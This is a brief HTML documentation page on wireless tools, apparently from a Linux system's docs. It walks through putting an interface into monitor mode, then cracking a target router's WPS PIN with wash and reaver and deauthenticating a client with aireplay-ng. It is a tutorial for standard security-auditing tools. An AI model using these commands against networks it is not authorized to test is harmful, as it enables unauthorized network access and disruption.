blob: 0696cd59bea5ccc8e30689155609ed175077b671 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
|
<html dir="ltr" lang="en">
<head>
<meta charset='utf-8'>
<title>Wireless</title>
</head>
<body>
<a href="index.html">Tools Index</a>
<h1>Wireless</h1>
<h2>Manual configuration</h2>
<pre>
# iwlist wlp2s0 scan
# iwconfig wlp2s0 essid name_of_network
</pre>
<p>To get mac address of the target cell;</p>
<pre>
# iwlist wlp2s0 scan
</pre>
<p>Example output that matter;</p>
<pre>
Cell 03 - Address: A8:A6:68:98:0C:C5
</pre>
<h4>Recover Password WPS</h4>
<p>First check processes that interfere with state of the interface and kill them;</p>
<pre>
# airmon-ng check
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1271 wpa_supplicant
1576 wpa_supplicant
1633 dhclient
Process with PID 1576 (wpa_supplicant) is running on interface wlan0
Process with PID 1633 (dhclient) is running on interface wlan0
</pre>
<p>Pkill or kill all of them, ex 1271;</p>
<pre>
# kill -15 1271
</pre>
<p>If that fails;</p>
<pre>
# kill -9 1271
</pre>
<p>If wireless card is intel;</p>
<pre>
# rmmod iwlmvm
# rmmod iwlwifi
# modprob iwlwifi
</pre>
<p>Put interface in monitor mode;</p>
<pre>
# iwconfig wlp2s0 mode monitor
# ifconfig wlp2s0 up
</pre>
<pre>
# airmon-ng start wlp2s0
Interface Chipset Driver
wlp2s0 Intel AC iwlwifi - [phy1]
(monitor mode enabled on mon0)
</pre>
<p>Airdump-ng don't report if a router have WPS or not, for that is used wash;</p>
<pre>
# wash -i wlp2s0
</pre>
<p>If the program report "Found packet with bad FCS", run with -C;</p>
<pre>
# wash -C -i wlp2s0
</pre>
<p>Put mon0 on same channel of target cell;</p>
<pre>
# iwconfig mon0 channel 6
</pre>
<p>Start the magic;</p>
<pre>
# reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -vv
</pre>
<p>If BSSID is cloaked, not being broadcasted, provide it to reaver;</p>
<pre>
# reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -e "bssid_name" -vv
</pre>
<p>-a address of access point, -c client to deauthenticate</p>
<pre>
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
</pre>
<a href="index.html">Tools Index</a>
<p>This is part of the Tribu System Documentation.
Copyright (C) 2020
Tribu Team.
See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
for copying conditions.</p>
</body>
</html>
|